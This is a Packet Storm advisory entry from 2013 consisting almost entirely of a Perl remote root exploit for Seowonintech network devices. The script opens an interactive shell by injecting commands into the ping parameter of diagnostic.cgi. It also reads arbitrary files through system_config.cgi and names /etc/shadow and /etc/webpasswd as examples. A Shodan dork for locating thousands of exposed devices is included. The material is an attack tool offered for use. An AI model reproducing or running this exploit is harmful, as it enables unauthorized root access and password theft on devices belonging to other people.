Seowonintech Remote Root

2013-06-22T00:00:00
ID PACKETSTORM:122126
Type packetstorm
Reporter Todor Donev
Modified 2013-06-22T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#   
# [+] Seowonintech all device remote root exploit v2  
# =====================================================  
# author: | email:  
# Todor Donev (latin) | todor dot donev   
# Òîäîð Äîíåâ (cyrillic) | @googlemail.com   
# =====================================================  
# type: | platform: | description:  
# remote | linux | attacker can get root  
# hardware | seowonintech | access on the device  
# =====================================================  
# greetings to:  
# Stiliyan Angelov,Tsvetelina Emirska,all elite   
# colleagues and all my friends that support me.   
# =====================================================  
# warning:  
# Results about 37665 possible vulnerabilities  
# from this exploit.  
# =====================================================  
# shodanhq dork:   
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013  
# =====================================================  
# P.S. Sorry for buggy perl.. :)  
# 2o13 Hell yeah from Bulgaria, Sofia  
#  
# Stop Monsanto Stop Monsanto Stop Monsanto  
#  
# FREE GOTTFRID SVARTHOLM WARG FREE  
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder   
# who was sentenced to two years in jail by Nacka   
# district court, Sweden on 18.06.2013 for hacking into  
# computers at a company that manages data for Swedish  
# authorities and making illegal online money transfers.  
  
use LWP::Simple qw/$ua get/;  
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];  
if(not defined $ARGV[0])  
{  
usg();  
exit;  
}  
print "[+] Seowonintech all device remote root exploit\n";  
$diagcheck = $host."/cgi-bin/diagnostic.cgi";  
$syscheck = $host."/cgi-bin/system_config.cgi";  
$res = $ua->get($diagcheck) || die "[-] Error: $!\n";  
print "[+] Checking before attack..\n";  
if($res->status_line != 200){  
print "[+] diagnostic.cgi Status: ".$res->status_line."\n";  
}else{  
print "[o] Victim is ready for attack.\n";  
print "[o] Status: ".$res->status_line."\n";   
if(defined $res =~ m{selected>4</option>}sx){  
print "[+] Connected to $ARGV[0]\n";  
print "[+] The fight for the future Begins\n";  
print "[+] Exploiting via remote command execution..\n";  
print "[+] Permission granted, old friend.\n";  
&rce;  
}else{  
print "[!] Warning: possible vulnerability.\n";  
exit;  
}   
}  
$res1 = $ua->get($syscheck) || die "[-] Error: $!\n";  
if($res1->status_line != 200){  
print "[+] system_config.cgi Status: ".$res1->status_line."\n";  
exit;  
}else{  
print "[+] Trying to attack via remote file disclosure release.\n";  
if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){  
print "[+] Victim is ready for attack.\n";  
print "[+] Connected to $ARGV[0]\n";  
print "[o] Follow the white cat.\n";  
print "[+] Exploiting via remote file dislocure..\n";  
print "[+] You feeling lucky, Neo?\n";  
&rfd;  
}else{  
print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";  
exit;  
}  
}  
sub rfd{  
while(1){   
print "# cat ";  
chomp($file=<STDIN>);  
if($file eq ""){ print "Enter full path to file!\n"; }  
$bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";  
$data=get($bug) || die "[-] Error: $ARGV[0] $!\n";  
$data =~ s/Null/File not found!/gs;  
if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){  
print $1."\n";  
}  
}  
}  
sub rce{  
while(1){   
print "# ";  
chomp($rce=<STDIN>);  
$bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";  
$rce =~ s/\|/\;/;  
if($rce eq ""){print "enter Linux command\n";}  
if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}  
if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}  
$data=get($bug) || die "[-] Error: $!\n";  
if (defined $data =~ m{(\s.*) Content-type:}sx){  
$result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');  
$result =~ s/ loss\n//;   
$result =~ s/ ms\n//;  
print $result;  
}  
}  
}  
sub usg  
{  
print " [+] Seowonintech all device remote root exploit\n";  
print " [!] by Todor Donev todor dot donev @ googlemail.com\n";  
print " [?] usg: perl $0 <victim>\n";  
print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";  
print " [1] exmp xpl RCE: # uname -a :)\n";  
print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";  
}  
`